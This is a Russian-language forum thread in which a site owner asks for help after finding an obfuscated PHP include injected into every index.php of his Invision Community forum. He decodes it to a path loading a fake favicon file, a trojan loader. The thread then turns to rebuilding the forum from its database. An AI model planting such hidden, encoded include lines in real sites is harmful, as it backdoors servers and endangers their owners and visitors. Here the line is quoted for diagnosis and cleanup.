Karagor Опубликовано 4 января, 2018 Поделиться Опубликовано 4 января, 2018 В какой-то момент перестала вызываться страница "непрочитанный контент". Полез пытаться разобраться и первое на что наткнулся это добавка во всех индексах: <?php /*acedb*/ @include "\x2fvar\x2fwww\x2fkar\x61gor\x2fdat\x61/ww\x77/sp\x6frt-\x68ors\x65.pr\x6f/up\x6coad\x73/ga\x6cler\x79/al\x62um_\x3337/\x66avi\x63on_\x31da2\x668.i\x63o"; /*acedb*/ /** * @brief Public bootstrap * @author <a href='https://www.invisioncommunity.com'>Invision Power Services, Inc.</a> * @copyright (c) Invision Power Services, Inc. * @license https://www.invisioncommunity.com/legal/standards/ * @package Invision Community * @since 18 Feb 2013 */ $_SERVER['SCRIPT_FILENAME'] = __FILE__; require_once 'init.php'; \IPS\Dispatcher\Front::i()->run(); Что это такое? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 4 января, 2018 Автор Поделиться Опубликовано 4 января, 2018 дкодировал, инклюда ведет @include "/var/www/karagor/data/www/sport-horse.pro/uploads/gallery/album_337/favicon_1da2f8.ico"; и выяснилось, что это троян PHP/Kryptik.BC Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 4 января, 2018 Автор Поделиться Опубликовано 4 января, 2018 Как хрень эту выковыривать-то... Есть у кого-нибудь опыт? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Cheshir Опубликовано 4 января, 2018 Поделиться Опубликовано 4 января, 2018 Скачайте полностью на комп, скачайте Notepad++, и удалите из всех файлов при помощи поиска/замены в файлах, потом замените на сайте... Не понятно, как умудрились схватить, хтмл для пользователей разрешен? слабенький хостинг и инъекцию сделали? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 5 января, 2018 Автор Поделиться Опубликовано 5 января, 2018 Стоял 3.4 сначала - началось еще на нем, думал все вычистил. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Cheshir Опубликовано 5 января, 2018 Поделиться Опубликовано 5 января, 2018 vps? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 5 января, 2018 Автор Поделиться Опубликовано 5 января, 2018 firstvds и да vps Короче кривыми руками снес на сервере папку с форумом... , что-то тупею с годами... ((( Пытаюсь поднять заново - ставлю чистый новый с тестовой базой, подменяю базу - и теряю полностью стиль. Можно зайти на форум посмотреть что там видно... как это лечить-то? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 5 января, 2018 Поделиться Опубликовано 5 января, 2018 При обновлении на 4.x файлы заменяются, в том числе и на index.php 2 минуты назад, Karagor сказал: как это лечить-то? Установить правильные права на директории. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 5 января, 2018 Автор Поделиться Опубликовано 5 января, 2018 индексы-то теперь чистые - только дизайн форум потерял я в трешке как-то еще разбирался - а тут как баран покачто так с новой базой все работает, а со старой нет по логике в базе самой есть какие-то пути и они не совпадают база конвертированная из трешки Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Cheshir Опубликовано 5 января, 2018 Поделиться Опубликовано 5 января, 2018 21 минуту назад, Karagor сказал: vps Проверьте сервак на вирусы, походу скрипт пишет какой-то, если еще на нем есть домены, посмотрите, есть ли в них такая же зараза. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 5 января, 2018 Автор Поделиться Опубликовано 5 января, 2018 запустил проверку... с тестовой базой теперь тоже не работает... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 6 января, 2018 Автор Поделиться Опубликовано 6 января, 2018 Антивирус на vps какой-то странный, что-то он там то ли делал, то ли нет... Вобщем в сухом остатке у меня есть база из которой форум виден без дизайна. Сам починить не могу - знаний и понимания не хватает. Может кто-то помочь? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
WOLF Опубликовано 6 января, 2018 Поделиться Опубликовано 6 января, 2018 установить с нуля форум, перенести необходимые таблицы с пользователями и темами, и дальше настроить все как было раньше Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 6 января, 2018 Автор Поделиться Опубликовано 6 января, 2018 Логически это понятно, а вот практически не очень Например в таблице core_members в чистой базе 93 поля, а в рабочей 97 и хрен его знает почему... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 6 января, 2018 Автор Поделиться Опубликовано 6 января, 2018 Кстати на вирусы таки сервер проверил - угроз не обнаружено Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Cheshir Опубликовано 6 января, 2018 Поделиться Опубликовано 6 января, 2018 9 минут назад, Karagor сказал: Кстати на вирусы таки сервер проверил - угроз не обнаружено сайты на серваке еще есть? Проверьте их на наличие похожего кода, если есть и на других сайтах, то 100% вирус на сервере, и то, чем вы проверяете просто напросто не эффективно. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 6 января, 2018 Автор Поделиться Опубликовано 6 января, 2018 Так получилось, что я снес все файлы - только база осталась, я же писал. Так что если вирус не мог приползти из базы, то фалов нет. а в какой таблице хранятся разделы форума? никак не пойму Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Karagor Опубликовано 6 января, 2018 Автор Поделиться Опубликовано 6 января, 2018 переношу таблицы в чистый форум перенеc core_members, forums_ удалось зайти в админку, но список пользователей не показывает нормально, как и список форумов... порядок действий не ясен вобщем Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
WOLF Опубликовано 6 января, 2018 Поделиться Опубликовано 6 января, 2018 1 час назад, Karagor сказал: переношу таблицы в чистый форум перенеc core_members, forums_ удалось зайти в админку, но список пользователей не показывает нормально, как и список форумов... порядок действий не ясен вобщем вам же вроде предложили уже помощь на другом форуме Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.